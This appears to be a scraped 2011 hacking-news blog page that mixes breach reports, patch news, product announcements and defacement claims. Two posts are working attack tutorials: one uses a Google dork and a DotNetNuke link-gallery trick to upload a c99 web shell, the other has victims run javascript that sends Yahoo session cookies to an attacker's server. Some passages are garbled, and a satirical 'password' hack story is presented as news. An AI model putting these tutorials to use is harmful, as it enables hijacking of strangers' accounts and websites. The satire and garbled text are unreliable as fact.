The World Now,"Third Age" Cyber Crime

The year 2010 was a crime of great team and could prove to mark the beginning of a "third age" of computer crimes, security expert Graham Cluley of Sophos, said before the review of the latest threats Company year.

The first period was marked by amateur hackers and virus creation on the PC, the second by the merger of organized crime with new Internet technologies, and as expected 2010 has seen a lot on both fronts in ways each increasingly sophisticated and varied.

That the points during the year, the criminals seem to be moving some of the old-fashioned junk mail and use their websites to incorporate crime e-mail, Battlefront, social networks.

"The scale subversive activities, Facebook seems out of control," said report co-author, Graham Cluley. "Social media sites, however, unable or unwilling to invest the resources necessary to stamp out," he writes, the last line of stinging comments made in recent months is evident satisfaction of security.

Verizon 2011 Data Breach Investigations Report Released !

Verizon 2011 Data Breach Investigations Report Released !

Data loss through cyber attacks decreased sharply in 2010, but the total number of breaches was higher than ever, according to the " Verizon 2011 Data Breach Investigations Report ." These findings continue to demonstrate that businesses and consumers must remain vigilant in implementing and maintaining security practices.

The number of compromised records involved in data breaches investigated by Verizon and the U.S. Secret Service dropped from 144 million in 2009 to only 4 million in 2010, representing the lowest volume of data loss since the report's launch in 2008. Yet this year's report covers approximately 760 data breaches, the largest caseload to date.

According to the report, the seeming contradiction between the low data loss and the high number of breaches likely stems from a significant decline in large-scale breaches, caused by a change in tactics by cybercriminals. They are engaging in small, opportunistic attacks rather than large-scale, difficult attacks and are using relatively unsophisticated methods to successfully penetrate organizations. For example, only 3 percent of breaches were considered unavoidable without extremely difficult or expensive corrective action.

The report also found that outsiders are responsible for 92 percent of breaches, a significant increase from the 2010 findings. Although the percentage of insider attacks decreased significantly over the previous year
(16 percent versus 49 percent), this is largely due to the huge increase in smaller external attacks. As a result, the total number of insider attacks actually remained relatively constant.

Hacking (50 percent) and malware (49 percent) were the most prominent types of attack, with many of those attacks involving weak or stolen credentials and passwords. For the first time, physical attacks -- such as compromising ATMs -- appeared as one of the three most common ways to steal information, and
constituted 29 percent of all cases investigated.

For the second year in a row, the U.S. Secret Service collaborated with Verizon in preparing the report. In addition, the National High Tech Crime Unit of the Netherlands Policy Agency (KLPD) joined the team this year, allowing Verizon to provide more insight into cases originating in Europe. Approximately one-third of Verizon's cases originated in either Europe or the Asia-Pacific region, reflecting the global nature of data breaches.

A complete copy of the "2011 Data Breach Investigations Report" is available for download.

Cybersecutity Expert Creat Program That Steals Text Messages !

Two cybersecurity researchers have just taught smartphones a lesson by developing a program that can eavesdrop and steal text messages from any phone on a GSM network – all in about 20 seconds.

The Guardian reported that Karsten Nohl and Sylvain Munaut spent a year honing their technology, which starts by sending a text message to a target phone; called a “ghost” message, the text doesn’t show up on the recipient’s phone, but enables the hackers to obtain the handset’s unique identification number.

Once that identification number is stolen, Nohl and Munaut were able to record phone conversations and texts from the hijacked phone. Their proof-of-concept hack can be deployed on any phone running on a GSM (Global System for Mobile Communications) network.

That’s a pretty big focus group – about 80 percent of the world’s phones run on a GSM network.

“Any GSM call is fair game,” Nohl told the BBC. He and his partner in cybercrime demonstrated their data-grabbing technology at last week’s Chaos Computer Club Congress (a gathering of the hacker organization) in Berlin.

Despite its mischievous nature, there is no devious design behind their hacking technology.

Nohl said he and Munaut do not plan to make the eavesdropping kit available for others to use. He said they developed it in the hopes it would serve as a wake-up call to the mobile security industry.

“This is all a 20-year-old infrastructure, with lots of private data and not a lot of security,” Nohl said of the GSM network. “We want you to help phones go through the same kind of evolutionary steps that computers did in the 1990s.”

Stolen data may be sold on cyber black market !

Hackers behind what computer security experts believe could be the biggest data theft in US history may be planning to sell the information to cyber criminals for targeted scams.

And while the tens of millions of names and email addresses swiped from online marketing firm Epsilon do not appear to have been used yet for cyber crime, the experts said it may just be a matter of time.

Major US banks, hotels, retail outlets and other companies have been warning customers to be wary of fraudulent emails after Epsilon acknowledged last week that hackers had gained access to the Texas-based company's email system.

Epsilon, which provides email services for some 2,500 companies around the world, has said that customer data for about two per cent of its total clients was exposed in what it called an "unauthorized entry."

Epsilon, which sends out over 40 billion emails a year, did not identify the firms whose customers' names and email addresses were taken but dozens of US companies have come forward over the past few days.

"It's basically a who's who from the retail and banking space," said Nicholas Percoco, head of Trustwave's SpiderLabs. "Some of the top brands in the world."

They include Hilton and Marriott hotels, telecom giant Verizon, drugstore chain Walgreens, the Home Shopping Network and retailers Best Buy, Kroger, New York & Co. and Target.

Among the banking and financial firms that have notified customers of the breach are Citigroup, JPMorgan Chase, Capital One, US Bank, Barclays Bank of Delaware and Ameriprise Financial.

Security experts said the data theft at Epsilon could be the largest ever in terms of sheer volume, comparable to the exploits of Albert Gonzalez, one of the most prolific US commercial hackers ever.

Gonzalez is serving 20 years in prison for stealing tens of millions of debit and credit card numbers from firms supporting major US retailers and financial institutions.

Percoco said the Epsilon data theft may involve as many as 100 million unique email addresses and "could end up being the largest breach ever of raw personal data, consumer data."

Marian Merritt, Internet Safety Advocate at Symantec, the maker of Norton anti-virus software, said data breaches occur frequently but "all indications are this could be the biggest one in history."

It is unlikely to prove as damaging, however, as the Gonzalez scams.

"The good news is it's just the names and the email addresses and the affiliation of the company that you did business with," said Joris Evers, a security expert at McAfee.

"It's not your credit card number or your social security card number or your home address... information that could be more personal and used in more nefarious ways immediately," Evers said. "There's a lot of work to do before you can convert this into cash."

The Epsilon data does not appear to have been used yet for any cyber crime.

"We have been looking around since this news broke for spam and scams and scammy websites that potentially take advantage of this breach and we haven't seen anything just yet," Evers said.

That may be because the hackers who carried out the Epsilon attack intend to sell the information to other cyber criminals, the experts said.

"They may be people who are buying and selling stolen data bases of user names and email addresses," said Symantec's Merritt.

"There are marketplaces on the Internet, underground markets, where people sell bulk bunches of email addresses and names," Evers added. "You can buy a million email addresses for 20 dollars or something like that.

"But that's just email addresses, mailing lists that you can then start spamming."

The information stolen from Epsilon is more valuable because it links names and email addresses with particular companies that an individual already has a trusted relationship with.

"They've got your name, not your user name, but your actual name, your email address and brands that you regularly do business with and trust in an email relationship," Merritt said.

"You've already identified yourself as willing to receive communications from those brands," she said. "So the cybercriminals have pretty good information to use against you."

Evers said such information can be a "treasure trove" for cyber attackers because now they can start personally targeting individuals, a tactic known as "spear phishing."

For example, "you might have bought something from LL Bean recently," he said. "You receive an email that says 'We want to confirm your order, please click here.'

"And you end up on a website that infects your computer with something. Or you're asked to type in your credit card number again to make sure the order goes through," he said. "And now, boom, I have your credit card information." Whatever form the attacks take, experts are certain they're coming.

"They didn't go get these email addresses and names just to get them," Percoco said. "They're going to use them."

Source : http://www.asiaone.com

China's Cyber Hackers Target Western Firms !

China's Cyber Hackers Target Western Firms !

Sky News has learnt of the growing threat Western governments and corporations are under from hackers based in China.

Cyber crime costs the UK tens of billions of pounds every year.
The attacks cannot be traced but I have gained access to some of the country's growing number of hackers to discover just how big a risk they pose:
The man I meet is 21, he has no technical training and has moved to Beijing from a small town in southern China.
But within minutes of our meeting, he's shown me how he can hack into my email account.
A few more clicks of his mouse, and he's stolen my credit card details as I make an online purchase.
He says he's a "cyber security expert" - not a hacker - but we can't use his name and he refuses to show his face.
I ask him whether he could successfully hack into more carefully guarded computer systems: those of government officials and top companies in the West.
"Even the strongest security systems have holes," he tells me. "Everyone knows that those people haven't realised that there are hackers who can attack them. They probably think they have the best security possible."
Last year, cyber attacks cost Britain £27bn. The global hub for targeted attacks is China. An estimated 1.6 billion attacks are launched from the country each month.
The Chinese government says it is cracking down on hackers. Last year authorities reportedly made several hundred arrests and closed one online hacking school that was said to have 180,000 members.
But other websites that offer the same service are still operating.
Sky News recently gained access to a conference organised by a well-known hacking group in a four-star hotel in Beijing.
The event was sponsored by a security firm with alleged connections to the Chinese military. Speakers covered topics such as Defeat Windows 7 and Virtual Viruses Infection.
The conference also highlighted the murky connections between hackers and the Chinese government.
One man who identified himself as a policeman said: "We're here to see if they have anything we can use. If there is, then we'll get in touch with them, and take the next step."
Chinese hackers are accused of breaching the computer systems of the Pentagon in the US and the French and German governments, as well as several Whitehall departments.
In 2009, investigators discovered that Ghostnet, the largest ever network of cyber attacks, could be traced back to China.
The operation's command and control had gained real time control over 1,200 computers belonging to foreign embassies, international organisations, and media groups in more than 100 countries.
However, according to experts, the biggest threat posed by attacks traced to China is the loss of industrial secrets.
Last year several attacks targeted some of the world's biggest oil and gas companies - an area of enormous strategic importance to China's economy.
It was also recently revealed that investment bank Morgan Stanley was hit by a six-month attack emanating from China.
Experts say Britain's high-tech industries are particularly vulnerable.
"Britain spends £25bn a year in these areas," says British cyber security expert Will Gilpin.
"It has a lot of specialist knowledge, abilities and plans available in its computers which are tremendously appealing to a country like China that wants to short circuit and leapfrog the Western countries in developing their economy."
But the young "cyber security expert" says there may be an even bigger threat. If the West ever came into conflict with China, he says the country's hackers would be able to inflict untold damage.
"They may be able to shut down the electrical grid," he says. "Lots of things don't function without electricity. You could stop a whole area or the entire country from working."

Emergency Adobe Flash Player patch coming today !

Emergency Adobe Flash Player patch coming today !

Less than a week after warning that hackers were embedding malicious Flash Player files (.swf) into Microsoft Word documents to launch targeted malware attacks, Adobe plans to release an emergency Flash Player patch today to fix the underlying problem.

The patch will fix a “critical” vulnerability in Flash Player 10.2.153.1 and earlier versions for Windows, Mac OS X Linux and Solaris.


According to this Secunia advisory, the flaw allows a hacker to completely hijack a vulnerable Windows computer:
A vulnerability has been reported in Adobe Flash Player, which can be exploited by malicious people to compromise a user’s system.


The vulnerability is caused due to an error when parsing ActionScript that adds a custom function to the prototype of a predefined class. This results in incorrect interpretation of an object (i.e. object type confusion) when calling the custom function, which causes an invalid pointer to be dereferenced.

Secunia has posted a technical analysis of the flaw as well.

Adobe has confirmed that the vulnerability (CVE-2011-0611) could cause a crash and potentially allow an attacker to take control of the affected system.

There are reports that this vulnerability is being exploited in the wild in targeted attacks via a malicious Web page or a Flash (.swf) file embedded in a Microsoft Word (.doc) or Microsoft Excel (.xls) file delivered as an email attachment, targeting the Windows platform. At this time, Adobe is not aware of any attacks via PDF targeting Adobe Reader and Acrobat. Adobe Reader X Protected Mode mitigations would prevent an exploit of this kind from executing.

A patch for Google Chrome users is already available in Chrome version 10.0.648.205.

Adobe plans to fix the vulnerability in Adobe Acrobat and Adobe Reader at a later date.

Google Fixing the little things !

Google Fixing the little things !

Ever since I joined the Gmail team, my friends have been eager to tell me, "I love Gmail ! Except for this one thing..." And every day, Gmail users share their "one thing" that would make Gmail better for them through our suggestions page. While we enjoy creating new solutions to old problems with features like Priority Inbox, those little annoyances and missing pieces are important, too. Recently, we've rolled out several small tweaks to Gmail to show it a little extra love. 

Here’s a rundown:

• Auto-save contacts setting: Most people like that Gmail automatically saves every email address you send messages to; it can help recover forgotten addresses of former teachers, bosses, and people you contacted once but never thought you'd need to contact again. For some people, though, this feature can cause too much contacts clutter. Today, we're rolling out a new setting to let you turn off the auto-save option. You’ll see it on the General tab of Gmail Settings.
• Better warnings for typos in email addresses: We all make typos, even when addressing email. In the old days, when you accidentally left out the "." in your ".com", Gmail would tell you there was an error but not point it out. Now, it’ll let you know which address has the problem -- much easier when sorting through a long “To:” list.
• Fewer annoying error pop-ups: Gmail's filters are really useful for organizing your messages automatically, but sometimes those filters can have unintended consequences, like sending mail you'd like to keep to the trash. When you replied to a message in the Trash, Gmail would show an error message you'd have to click through to continue working. Now, you’ll still see the error, but it's no longer a pop up and it gives you an easy way to move the conversation out of Trash right from there.
• Easier transitions between certain actions: You can create filters quickly from the "Filter messages like this" option that shows up on some messages. Now, after you've saved your filter, Gmail will send you right back to the message you were reading so you can go right back to what you were doing before.
• Keyboard shortcut guide for everyone: Keyboard shortcuts can be a huge productivity boosters. If you've never tried them, try hitting Shift+? -- that's one keyboard shortcut that's now automatically turned on and gives you a peek into the rest of them and a quick link to enable from there.
• Refresh button: For a long time, people have pointed out the inconsistency of having "Refresh" as a link in the menu bar, next to all of the buttons. We changed it to a button to match.

If any of these small fixes were your "one thing," we hope you've noticed the changes as they rolled out. When you find the next little tweak that would make you love Gmail even more, let us know.

Hackers steal Dell 1000's customer information !

Hackers steal Dell 1000's customer information !

The personal information of thousands of Australians has been stolen by hackers who raided a US-based database company, in what some experts are calling the biggest data theft in US history.

Dell Australia says customer data was "exposed" by an unauthorised entry into the computer system of email service provider Epsilon.

The information includes the names and email addresses of Dell Australia's customers.

In a statement, Dell assured its customers that credit card, banking and other personally-identifiable information was not at risk and remained secure.

Australian Privacy Commissioner Timothy Pilgrim says Dell has informed him of the data breach.

"Dell Australia have also advised all of its customers affected by the data breach and have set up an advice service that those customers can use to obtain further information if needed," he said in a statement.

Mr Pilgrim has launched an investigation into the incident.

"I have also been advised that Epsilon has commenced an investigation into this matter and is keeping Dell Australia informed," he said.

Dell is warning affected customers to be aware of unusual or suspicious emails requesting personal information.

The crime is being described by experts as the biggest data theft in US history, and it is believed the hackers may be planning to sell the information to cyber criminals for targeted scams.

And while the tens of millions of names and email addresses swiped do not appear to have been used yet for cyber crime, experts said it may just be a matter of time.

Ed Heffernan, chief executive of Alliance Data Systems Corp, Epsilon's parent company, apologised for the breach and says it is being investigated by federal authorities and outside computer forensics experts.

"We will leave no stone unturned and are dealing with this malicious act by highly sophisticated cyber thieves with the greatest sense of urgency," he said.

Experts says the data theft could be the largest ever in terms of volume, comparable to the exploits of Albert Gonzalez, a hacker serving 20 years in prison for stealing tens of millions of debit and credit card numbers.

"All indications are this could be the biggest one in history," says Marian Merritt, internet safety advocate at Symantec, the maker of Norton anti-virus software.

It is unlikely, however, to prove as damaging as the Gonzalez scams.

"The good news is it's just the names and the email addresses and the affiliation of the company that you did business with," said Joris Evers, a security expert at McAfee.

"It's not your credit card number or your social security card number or your home address... information that could be more personal and used in more nefarious ways immediately," he said.

"There's a lot of work to do before you can convert this into cash.

GNOME 3.0 Released , Available for Download !

GNOME 3.0 Released , Available for Download !

GNOME 3.0 is a major milestone in the history of the GNOME Project. The release introduces an exciting new desktop which has been designed for today's users and which is suited to a range of modern computing devices. GNOME's developer technologies have been substantially improved for 3.0. Modernized and streamlined, they will enable developers to provide better user experiences with less time and effort. And GNOME 3.0 comes with the same GNOME applications that users know and trust, many of which have received significant enhancements.

Download Now : http://gnome3.org/tryit.html

One More Xbox Live derector hacked!

Here’s an interesting way to get noticed for a job (or fine) by Microsoft..

A hacker known as “Predator” has been able to phish information from Xbox Live’s Director of Policy and Enforcement, Stephen Toulouse (aka “Stepto”), gaining email and address information via his personal website server and was then able to alter the Chief’s details online.

This latest hacker attack on Xbox Live accounts follows a leak of info belonging to Director of Programming Larry Hryb (aka “Major Nelson”) around this time last year.

On the outset no serious harm was done by the little scam, but it’s a scam “Predator” hopes will make a statement to Microsoft in regards to their security policies. He states “I’m simply letting them know I’m willing to help them secure accounts from future hackers” – an innovative method of self-promotion!

In a boastful video uploaded to YouTube “Predator” claims to be “Xbox Live’s greatest account jacker” and is raking in the cash from causing trouble for Xbox online gamers, attacking accounts which are “open to hacking”.

The hacker’s arrogant attitude and boastful posts may actually get him more attention than he bargained for and not quite the attention he was looking to get. Other reports suggest this was a revenge attack, following 35 cases where the hacker was banned for user violations over the Xbox Live network. Massive fines are surely on the way once the little beggar gets caught!

Protal Hacking (DNN) - Website Hacking Technique Explaind !

Hello frnds, One more hacking method called "Portal Hacking (DNN)". This method also uses google search to find hackable sites.. Now you can imagine that how much google.com is important for Hackers also...

 

 Lets start the tutorials...

 

Step 1 :http://www.google.com

Step 2:Now enter this dork

                                           :inurl:/tabid/36/language/en-US/Default.aspx

this is a dork to find the Portal Vulnerable sites, use it wisely.

Step 3: 
you will find many sites, Select the site which you are comfortable with.

Step 4: 
For example take this site.
Example:     http://www.abc.com/Home/tabid/36/Lan...S/Default.aspx

Step 5: Now replace

/Home/tabid/36/Language/en-US/Default.aspx

  
with this

/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx 

 

Step 6:You will get a Link Gallary page.So far so good!

Step 7: Dont do anything for now,wait for the next step...

Step 8:Now replace the URL in the address bar with a Simple Script 

                        javascript:__doPostBack('ctlURL$cmdUpload','')
 
Step 9:You will Find the Upload Option

Step 10:
Select Root

Step 11:
Upload your package Your Shell c99,c100 etc etc 

Hope all of like my articles...  Please comment !

Hack Yahoo Accounts with Session ID's or Session Cookies !

Hello Friends, This is an Guest post By Mr. Aneesh M. Makker admin of http://www.explorehacking.com/ on "Hack Yahoo accounts with Session IDs or session cookies".

What are session IDs or session cookies ?
Talking in simple language, whenever we sign into an account it generates a unique piece of string. One copy is saved on server and other in our browser as cookie. Both are matched every time we do anything in our account. This piece of string or login session is destroyed when we click on 'Sign Out' option.

Just login to yahoo.com. Type in browser javascript:alert(document.cookie);
You would get a pop up box showing you the cookies. Now login to your account and do same thing, you would see more elements added to the cookies. These represent sessions ids .

Note: By saying , stealing sessions or stealing cookies, I mean the same thing. Sessions are stored in our browser in form of cookies.

 An attacker can steal that session by convincing victim to run a piece of code in browser. Attacker can use that stolen session to login into victim's account without providing any username/password. This attack is very uncommon because when the victim  clicks 'Sign out' , session gets  destroyed and attacker too also gets signed out.

But in case of yahoo, its not the same.The attacker doesnt get signed out when victim clicks 'Sign out'. Though the session automatically gets destroyed after 24hrs  by yahoo. But when user simply refreshes the windows in yahoo account, he gets sessions for next 24 hrs. This means, once the  yahoo account session is stolen , attacker can access the account for life time by refreshing window in every 24hrs. I am not actually sure whether its 24 or 48 hrs.

Requirement: Download some files from here
http://www.ziddu.com/downloadlink/13712247/cookiestealer.rar

Tutorial to steal session IDs :-
1. Sign Up for an account at any free webhosting site. I have chosen my3gb.com.

2.  Login to your account and go to file manager. Upload the four files that you have just downloaded.
    Make a new directory 'cookies' here.

3. Give this  code to victim to run in his browser when he would be logged in to his yahoo account. Yahoo.php is basically cookie stealing script and hacked.php executes the stolen cookies in browser.
Stolen cookies get stored in directory 'cookies'
javascript:document.location='http://yourdomain.com/yahoo.php?ex='.concat(escape(document.cookie)); 
He would again redirected to his yahoo account.

4. Open the hacked.php . The password is 'explore'.

You must have got the username of victim's account. Simply Click on it and it would take you to inbox of victim's yahoo account without asking for any password.

Now it doesn't matter if victim signs out from his account, you would remain logged into it.

Note: You can try this attack by using two browsers. Sign into yahoo account in one browser and run the code. Then sign in through other browser using stolen session.

Thank you for reading this Article.
Rohit

Bihar Cricket Council website hacked by ZCompany Hacking Crew !

Bihar Cricket Council website hacked by ZCompany Hacking Crew !

Statement given by Hacker "- Recently a indian hacker called Angel aka 4d0r4bl3 defaced a pakistani government site sending a warning message to ZHC & TeaMp0isoN, our reply:
- We Deface for a reason, our reason for defacing is to raise awareness of issues in the world, our main focus is palestine & kashmir - we have no time for silly little "cyber-wars" go ask some PCA kids to play with you -".

Hacked site Link : http://biharcricket.com/
Mirror Link : http://zone-h.com/mirror/id/13033297

Email & Bank Account of DIRECTOR,Indian Ministry of Communications & IT Hacked by Zcompany Hacking Crew !

Last Night (24 March,2011) we (The Hacker News) got an email from id of Amar Singh Meena,DIRECTOR (T)TEC, Ministry of Communications & IT. But this email was sent by a Hacker from his email id having codename "Hard Hunter" from Zcompany Hacking Crew. Zcompany Hacking Crew or ZHC Hack for reason to raise awareness of the issues in the world with a main focus on Kashmir & Palestine. Now they have access to Personal Email ID of Mr. Amar Singh Meena and also have his ICICI Bank details. 


Even Today 1389 Indian websites defaced/Hacked By ZCompany Hacking Crew & TeaMp0isoN : Read Here


How ZHC hack into Email :
Hard Hunter [ZHC] had a access to a Online Store where he found email of Amar Singh, they hack logged into his email and then went for his ICICI details.


Message From ZHC :
As in above image, The email send us (The Hacker News) from hacked email , they said that :


Hello Hackers News,
This is not A.S meena himself but its me Hard Hunter from Zcompany
Hacking Crew.We want to show this that we've successfully hacked into
the Director's email and got his bank account details and etc.We're
going to show those documents soon

Regards
Hard Hunter[ZHC]


They Have told that, they will public all his Bank and Email data details soon !


Proof Of Hack :
Here some Screenshots send us By ZHC as the Proof of Hack :
1.) Reliance share hold Email

 









2.) Email Related to National Securities Depository Limited

3.) ICICI Bank Account Details / Account Successfully Accessed

India's CBI plans to send teams to US, Europe to trace hackers !

Against the backdrop of the attack on its website by "Pakistan Cyber Army", the CBI is considering to send its team to the US and Europe to trace hackers involved in the defacement.

Sources said the agency officials have pin-pointed three Internet Protocol (IP) address -- a unique numerical label borne by each computer in a network that use worldwide web for communications -- two originated from Seattle, Pennsylvania in the US and other in Daugavpils, Latvia in northern Europe.

They said the agency has moved a local court here seeking permission to access authorities in the US and Latvia for collecting information on the IP addresses.

The CBI had on December 4 last year registered a case against unknown persons of "Pakistani Cyber Army" for hacking and defacement of its website under various Sections of Information Technology Act.

Indian needs Hacker in 2011 !

When other 12-year-olds spend the day playing or watching films, Shantanu Gowde has been in the news for spending time with IT professionals twice his age. India's youngest hacker, Shantanu was just three years old when he used the computer to make PowerPoint presentations, slideshows and birthday cards for friends. Now, he has 'ethically' hacked into websites of over 50 corporate houses and individuals and gives regular security tips to a Mumbai IT firm.

Worried over increasing piracy and leaks of movie trailers and posters, film-makers and production companies have turned to experts who can take down the offending websites. Girish Kumar, managing director of Aiplex Software has provided online anti-piracy solutions to over 50 Bollywood films including My Name is Khan, Housefull and Peepli Live and big banners like UTV, Eros and Yashraj Films. He says, "Most production houses are aware of the fact that online piracy is a real threat. Often, copyright notices do the trick. With sites that offer 'torrents' of movie downloads, we flood it with fake links or direct the website address away from the actual page."

In 2010, hackers made news several times, for instance, when Future Group's flagship ecommerce portal stopped functioning for two days after an attack, investigation agency CBI's portal was hacked by programmers who identified themselves as "Cyber Pakistani army". Rajya Sabha member and industrialist Vijay Mallya's personal website too was allegedly broken into by Pakistani hackers. The US Army website also stopped functioning for a day after being hacked. Social messaging service Twitter also shutdown for hours, while Facebook experienced intermittent access problems after such attacks.

Explains security evangelist Rohit Srivastava, "A hacker's job is to help the company find and plug loopholes in the system. Companies hire us to build a team of inhouse security which develops software and systems that are hacking-proof." Rohit is the founder of Hack-Club, a first for hackers in India, to increase security awareness among the general public.

As the unconventional skill gains credibility, more and more people are opting for it as a career. Says Sheetal Kapoor, who has done a post-graduate diploma course in ethical hacking and cyber security, "I have worked as a cyber security consultant with MNCs and on certain government projects. Companies are increasingly concerned about the security of their websites."

Over the years, hackers have perfected innovative ways to crack into protections built into a computer operating system. Wellknown hacker Ankit Fadia began by experimenting with his home computer at the age of 12 and in two years, wrote his first book on the subject. Ankit claims he was consulted by an intelligence agency for breaking an encrypted message that was believed to have been sent by one of Osama Bin Laden's men. Today, he is a security consultant for several MNCs and even hosts a show on a popular youth channel. He says, "I was attracted to the power of being able to do something most people could not, that's how my love for hacking began. Now, I have been able to convert my hobby into a profession as well."

Ankit adds, "As the reach of the Internet spreads, the challenges that organizations, whether government, semigovernment or private, face is enormous. New vulnerabilities are discovered daily and can expose the information network to unwanted elements."

A much abused word, "hacker" originally meant "clever programmer ". Hackers stunned the world when WikiLeaks supporters unitedly brought down the Swedish government's website along with those of Paypal and Master - Card. In fact, the world - wide web was discovered by hacker Timothy J. Berners-Lee, who was caught hacking and banned from using his university's computer. Hacker Steven Gary Wozniak invented the Apple I, one of the first microcomputers. He and Steve Jobs assembled the first prototypes in Job's garage. The software was coded mostly by Wozniak.

Among the country's best ethical hackers, Sunny Vaghela e-mail account was hacked when he was 16. And the curiosity to catch the hacker motivated him to become a professional himself. ''I hacked into major government and private websites and later sent them a note, suggesting possible solutions,'' he says.

Sunny, whose technical advice was accepted and adopted by Google's social networking website Orkut, when he pointed out loopholes to its administrators, explains, "A professional hacker can earn more than a regular IT professional. In the last six months, nearly 4.5 lakh sites were hacked, and last year, around 2.5 lakhs were hacked. Antivirus and firewalls are not enough to protect your data." Dinesh Pillai, CEO Mahindra SSG and his team of "ethical hackers" believe that every company needs trained hands to implement security risk management systems. "The demand for this skill is going to go up as companies realize the need to protect business and brand value."

Hackers Changes Millions of Passwords to "password" !

 Hackers Changes Millions of Passwords to "password" !

Passwords from over 3,000,000 user accounts were apparently set to "password" late last night in a wide-spread hack that affected hundreds of news, retail and Web 2.0 sites. Most affected users are completely unaware of the attack.

According to current statistics, 62% of affected users would not notice such a change as their password was already "password".


Several sites have reported that they are taking steps to protect compromised accounts. In addition, many sites are creating a new rule to ban using the word "password" as a password.


Users are reacting fiercely to the hack but even more so to the ban many sites are putting on one of the world's most popular passwords. Online riots are to be expected.


The hacker group named "Obvious" has claimed credit for last evening's attack. Thousands of hacked Twitter and Facebook accounts posted the message "We are all Obvious! Don't Expect Us".


A 1.9 GB file containing more than 3,000,000 user names — and one password — is now available for download as a torrent file via The Pirate Bay.


To avoid problems like this in the future, we are recommending users to change their password everywhere to "password1", which is obviously more secure.

MumbaiITPro User Group Hacked by TriCk [TeaMp0isoN]

MumbaiITPro User Group Hacked by TriCk [TeaMp0isoN]

MumbaiITPro User Group is an online technical community initiative for the IT Professionals. They are supported by Global IT Community Association (GITCA) and Microsoft Corporation.


Hacked site : http://mumbaiitpro.org/
Mirror : http://mirror.sec-t.net/defacements/?id=7039